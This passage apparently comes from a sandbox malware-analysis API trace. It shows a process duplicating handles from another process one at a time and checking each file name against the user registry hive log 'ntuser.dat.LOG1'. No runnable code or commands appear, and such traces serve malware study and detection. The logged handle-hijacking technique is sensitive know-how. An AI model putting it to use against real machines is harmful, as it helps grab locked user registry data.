hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.950] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.951] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.951] CloseHandle (hObject=0x670) returned 1 [0151.951] CloseHandle (hObject=0x680) returned 1 [0151.951] CloseHandle (hObject=0x62c) returned 1 [0151.951] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.951] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.952] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.952] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.953] CloseHandle (hObject=0x670) returned 1 [0151.953] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.953] CloseHandle (hObject=0x680) returned 1 [0151.953] CloseHandle (hObject=0x62c) returned 1 [0151.953] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.953] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.953] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.953] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.954] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.954] CloseHandle (hObject=0x670) returned 1 [0151.954] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.954] CloseHandle (hObject=0x680) returned 1 [0151.954] CloseHandle (hObject=0x62c) returned 1 [0151.954] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.954] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.955] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.956] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.956] CloseHandle (hObject=0x670) returned 1 [0151.956] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.956] CloseHandle (hObject=0x680) returned 1 [0151.956] CloseHandle (hObject=0x62c) returned 1 [0151.956] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.956] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.957] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.957] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.957] CloseHandle (hObject=0x670) returned 1 [0151.957] _wcsicmp (_Str1="\\amd64_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_0a1fd3a3a768b895", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.957] CloseHandle (hObject=0x680) returned 1 [0151.957] CloseHandle (hObject=0x62c) returned 1 [0151.958] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.958] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.959] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.959] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.959] CloseHandle (hObject=0x670) returned 1 [0151.959] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.959] CloseHandle (hObject=0x680) returned 1 [0151.960] CloseHandle (hObject=0x62c) returned 1 [0151.960] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.960] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.960] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.960] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.961] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.961] CloseHandle (hObject=0x670) returned 1 [0151.961] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.961] CloseHandle (hObject=0x680) returned 1 [0151.961] CloseHandle (hObject=0x62c) returned 1 [0151.961] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.961] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.961] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.962] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.963] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.963] CloseHandle (hObject=0x670) returned 1 [0151.963] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.963] CloseHandle (hObject=0x680) returned 1 [0151.963] CloseHandle (hObject=0x62c) returned 1 [0151.963] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.963] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x278, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.964] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.964] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.964] CloseHandle (hObject=0x670) returned 1 [0151.964] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.965] CloseHandle (hObject=0x680) returned 1 [0151.965] CloseHandle (hObject=0x62c) returned 1 [0151.965] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.965] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.965] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.966] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.966] CloseHandle (hObject=0x670) returned 1 [0151.966] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.966] CloseHandle (hObject=0x680) returned 1 [0151.966] CloseHandle (hObject=0x62c) returned 1 [0151.966] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.966] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.966] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.967] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.967] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.968] CloseHandle (hObject=0x670) returned 1 [0151.968] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.968] CloseHandle (hObject=0x680) returned 1 [0151.968] CloseHandle (hObject=0x62c) returned 1 [0151.968] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.968] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.968] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.969] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.969] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.969] CloseHandle (hObject=0x670) returned 1 [0151.969] _wcsicmp (_Str1="\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.969] CloseHandle (hObject=0x680) returned 1 [0151.969] CloseHandle (hObject=0x62c) returned 1 [0151.969] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.969] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.970] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.970] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.971] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.971] CloseHandle (hObject=0x670) returned 1 [0151.971] _wcsicmp (_Str1="\\comctl32.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -11 [0151.971] CloseHandle (hObject=0x680) returned 1 [0151.971] CloseHandle (hObject=0x62c) returned 1 [0151.971] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.971] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.971] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.972] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.972] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.972] CloseHandle (hObject=0x670) returned 1 [0151.972] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.972] CloseHandle (hObject=0x680) returned 1 [0151.973] CloseHandle (hObject=0x62c) returned 1 [0151.973] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.973] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.973] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.984] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.985] CloseHandle (hObject=0x670) returned 1 [0151.985] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.985] CloseHandle (hObject=0x680) returned 1 [0151.985] CloseHandle (hObject=0x62c) returned 1 [0151.985] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.985] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.986] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.986] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.987] CloseHandle (hObject=0x670) returned 1 [0151.987] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.987] CloseHandle (hObject=0x680) returned 1 [0151.987] CloseHandle (hObject=0x62c) returned 1 [0151.987] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.987] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.987] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.988] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.988] CloseHandle (hObject=0x670) returned 1 [0151.988] _wcsicmp (_Str1="\\User Pinned", _Str2="\\ntuser.dat.LOG1") returned 7 [0151.988] CloseHandle (hObject=0x680) returned 1 [0151.988] CloseHandle (hObject=0x62c) returned 1 [0151.988] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.988] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x408, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.988] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.989] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.990] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.990] CloseHandle (hObject=0x670) returned 1 [0151.990] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0151.990] CloseHandle (hObject=0x680) returned 1 [0151.990] CloseHandle (hObject=0x62c) returned 1 [0151.990] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.990] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.990] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.991] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.991] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.991] CloseHandle (hObject=0x670) returned 1 [0151.992] _wcsicmp (_Str1="\\Libraries", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.992] CloseHandle (hObject=0x680) returned 1 [0151.992] CloseHandle (hObject=0x62c) returned 1 [0151.992] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.992] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x458, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.992] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.993] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.993] CloseHandle (hObject=0x670) returned 1 [0151.993] _wcsicmp (_Str1="\\Libraries", _Str2="\\ntuser.dat.LOG1") returned -2 [0151.993] CloseHandle (hObject=0x680) returned 1 [0151.993] CloseHandle (hObject=0x62c) returned 1 [0151.993] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.993] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.993] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.995] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.995] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.995] CloseHandle (hObject=0x670) returned 1 [0151.995] _wcsicmp (_Str1="\\User Pinned", _Str2="\\ntuser.dat.LOG1") returned 7 [0151.995] CloseHandle (hObject=0x680) returned 1 [0151.995] CloseHandle (hObject=0x62c) returned 1 [0151.996] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.996] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.996] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.996] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.997] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.997] CloseHandle (hObject=0x670) returned 1 [0151.997] _wcsicmp (_Str1="\\Start Menu", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.997] CloseHandle (hObject=0x680) returned 1 [0151.997] CloseHandle (hObject=0x62c) returned 1 [0151.997] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.997] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0151.998] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0151.998] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0151.999] CloseHandle (hObject=0x670) returned 1 [0151.999] _wcsicmp (_Str1="\\Start Menu", _Str2="\\ntuser.dat.LOG1") returned 5 [0151.999] CloseHandle (hObject=0x680) returned 1 [0151.999] CloseHandle (hObject=0x62c) returned 1 [0151.999] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0151.999] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0151.999] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.000] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.000] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.000] CloseHandle (hObject=0x670) returned 1 [0152.000] _wcsicmp (_Str1="\\Start Menu", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.000] CloseHandle (hObject=0x680) returned 1 [0152.001] CloseHandle (hObject=0x62c) returned 1 [0152.001] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.001] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.001] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.002] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.002] CloseHandle (hObject=0x670) returned 1 [0152.002] _wcsicmp (_Str1="\\Start Menu", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.002] CloseHandle (hObject=0x680) returned 1 [0152.002] CloseHandle (hObject=0x62c) returned 1 [0152.002] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.002] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x514, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.003] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.003] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.004] CloseHandle (hObject=0x670) returned 1 [0152.004] _wcsicmp (_Str1="\\Desktop", _Str2="\\ntuser.dat.LOG1") returned -10 [0152.004] CloseHandle (hObject=0x680) returned 1 [0152.004] CloseHandle (hObject=0x62c) returned 1 [0152.004] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.004] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x51c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: 